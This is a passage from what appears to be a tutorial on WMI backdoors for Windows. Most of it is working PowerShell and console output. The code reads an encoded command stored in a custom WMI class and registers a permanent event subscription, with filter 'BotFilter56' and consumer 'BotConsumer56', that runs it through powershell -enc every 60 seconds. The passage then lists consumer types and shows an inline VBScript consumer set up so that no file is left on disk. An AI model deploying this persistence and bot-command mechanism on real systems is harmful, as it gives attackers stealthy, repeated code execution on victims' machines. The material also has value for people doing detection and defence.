    $EvilClass.Put()
    
  4. Run on the server to view the result

    ([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
    
    PS C:\Users\admin> ([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
    
    Name       : IP172161211
    Value      : Run Command Test!
    Type       : String
    IsLocal    : True
    IsArray    : False
    Origin     : Win32_CommandTest
    Qualifiers : {CIMTYPE}
    
  5. The client runs the PowerShell command on a timer

    #read the encoded instruction
    $EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
    $filterName = 'BotFilter56'
    $consumerName = 'BotConsumer56'
    #create an __EventFilter that sets the trigger condition: fire every 60 seconds
    $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
    
    #create a CommandLineEventConsumer that defines the action to run
    $Arg = @{
        Name                = $consumerName
        CommandLineTemplate = "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -enc $EncodedPayload"
    }
    
    $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
    #bind the filter to the consumer
    Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
    
    PS C:\Windows\system32> Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
    
    __GENUS                 : 2
    __CLASS                 : __FilterToConsumerBinding
    __SUPERCLASS            : __IndicationRelated
    __DYNASTY               : __SystemClass
    __RELPATH               : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer56\"",Filter="
                              __EventFilter.Name=\"BotFilter56\""
    __PROPERTY_COUNT        : 7
    __DERIVATION            : {__IndicationRelated, __SystemClass}
    __SERVER                : DEVC1
    __NAMESPACE             : ROOT\subscription
    __PATH                  : \\DEVC1\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\
                              "BotConsumer56\"",Filter="__EventFilter.Name=\"BotFilter56\""
    Consumer                : CommandLineEventConsumer.Name="BotConsumer56"
    CreatorSID              : {1, 5, 0, 0...}
    DeliverSynchronously    : False
    DeliveryQoS             :
    Filter                  : __EventFilter.Name="BotFilter56"
    MaintainSecurityContext : False
    SlowDownProviders       : False
    PSComputerName          : DEVC1
    

Detection: see the section on WMI backdoor detection and removal above [requires administrator privileges].

WMI Backdoor background (further notes on the timed-execution mechanism)

1. EventFilter: sets the trigger condition by running a WQL query; the query types are:

(1) Data queries

SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application'

(2) Event queries

SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance.__CLASS = 'win32_TerminalService'

(3) Schema queries

SELECT * FROM meta_class WHERE __this ISA "Win32_BaseService"

2. Consumer: the action performed once the condition is met; the built-in consumer classes are:

(1) ActiveScriptEventConsumer
(2) LogFileEventConsumer
(3) NTEventLogEventConsumer
(4) SMTPEventConsumer
(5) CommandLineEventConsumer

3. Two ways to run a VBScript with an ActiveScriptEventConsumer

(1) Run an existing script file directly

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";
    ScriptFileName = "c:\\asec2.vbs";
};

(2) Embed the script inline, so no script file is left on disk

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";

    ScriptText =
        "Dim objFS, objFile\n"
        "Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n"
        "Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\","
        " 8, true)\nobjFile.WriteLine \"Time: \" & Now & \";"
        " Entry made by: ASEC\"\nobjFile.WriteLine"
        " \"Application closed. UserModeTime:  \" & "
        "TargetEvent.TargetInstance.UserModeTime &_\n"
        "\"; KernelModeTime: \" & "
        "TargetEvent.TargetInstance.KernelModeTime "
        "& \" [hundreds of nanoseconds]\"\n"
        "objFile.Close\n";
};